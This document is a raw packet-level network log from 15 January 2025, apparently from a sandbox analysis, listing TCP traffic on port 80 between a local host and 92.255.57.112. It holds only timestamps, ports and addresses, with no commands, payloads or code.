                                                                                                                                                                                                Jan 15, 2025 10:09:10.583739042 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620589018 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620616913 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620631933 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620644093 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620656013 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620667934 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620683908 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620693922 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620704889 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620718002 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620718956 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620729923 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620763063 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620763063 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620847940 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620860100 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620872021 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620883942 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620897055 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620912075 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620925903 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620949984 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620980978 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.620994091 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621061087 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621083975 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621108055 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621129036 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621200085 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621212006 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621226072 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621237040 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621252060 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621275902 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621294975 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621377945 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621388912 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621402025 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621418953 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621449947 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621450901 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621464014 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621476889 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621495962 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621507883 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621516943 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621541977 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621551037 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621573925 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621581078 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621587038 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621607065 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621618986 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621632099 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621644974 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621675968 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621860027 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621871948 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621891975 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621901989 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621910095 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621913910 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621927023 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621932030 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621941090 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621948957 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621972084 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621984005 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621988058 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.621994972 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.622008085 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.622020006 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.622030020 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.622030020 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.622042894 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.622066021 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.622087002 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625715017 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625729084 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625749111 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625758886 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625771046 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625782013 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625792980 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625794888 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625811100 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625819921 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625825882 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625839949 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625849009 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625866890 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625869036 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625880957 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625893116 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625904083 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625906944 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625916958 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625927925 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625938892 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625938892 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625953913 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625955105 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625966072 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.625983953 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626017094 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626223087 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626280069 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626344919 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626355886 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626384974 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626385927 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626396894 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626410007 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626421928 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626426935 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626441002 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626450062 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626455069 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626468897 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626480103 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626492977 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626517057 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626549959 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626575947 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626588106 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626600981 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626614094 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626621008 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626626968 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626646996 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626957893 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626970053 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.626991034 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627001047 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627007008 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627013922 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627032995 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627044916 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627053976 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627053976 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627058983 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627073050 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627108097 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627115965 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627125978 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627136946 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627150059 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627161026 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627171993 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627173901 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627193928 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627229929 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627240896 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627254009 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627268076 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627298117 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627367973 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627685070 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627703905 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627717018 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627723932 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627732038 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627746105 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627754927 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627759933 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627780914 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627830982 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627842903 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627855062 CET804970792.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627882957 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.627907991 CET4970780192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632761002 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632775068 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632786036 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632801056 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632834911 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632848024 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632869959 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632879972 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632880926 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632903099 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632915974 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632922888 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632927895 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632941008 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632952929 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632966042 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632986069 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632991076 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632998943 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.632999897 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633006096 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633021116 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633088112 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633100986 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633121014 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633131981 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633143902 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633145094 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633176088 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633177042 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633188963 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633198023 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633203983 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633214951 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633220911 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633230925 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633285046 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633296013 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633331060 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633335114 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633348942 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633358002 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633375883 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633378983 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633392096 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633404016 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633420944 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633420944 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633435965 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633450985 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633455038 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633469105 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633480072 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633481979 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633496046 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633517981 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633533001 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633543015 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633547068 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633558989 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633589983 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633601904 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633609056 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633613110 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633625984 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633630037 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633652925 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633666992 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633758068 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633775949 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633783102 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633788109 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633799076 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633810043 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633819103 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633821964 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633836031 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633845091 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633862972 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633888006 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633899927 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633909941 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633929968 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633946896 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633958101 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633970022 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633980989 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.633994102 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634001017 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634015083 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634025097 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634033918 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634046078 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634057045 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634071112 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634078979 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634083033 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634102106 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634119987 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634166956 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634186983 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634198904 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634232998 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634243965 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634254932 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634263039 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634268999 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634274960 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634322882 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634325981 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634335041 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634346962 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634358883 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634367943 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634377003 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634408951 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634547949 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634558916 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634569883 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634588003 CET804970892.255.57.112192.168.2.5
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634597063 CET4970880192.168.2.592.255.57.112
                                                                                                                                                                                                Jan 15, 2025 10:09:10.634602070 CET804970892.255.57.112192.168.2.5
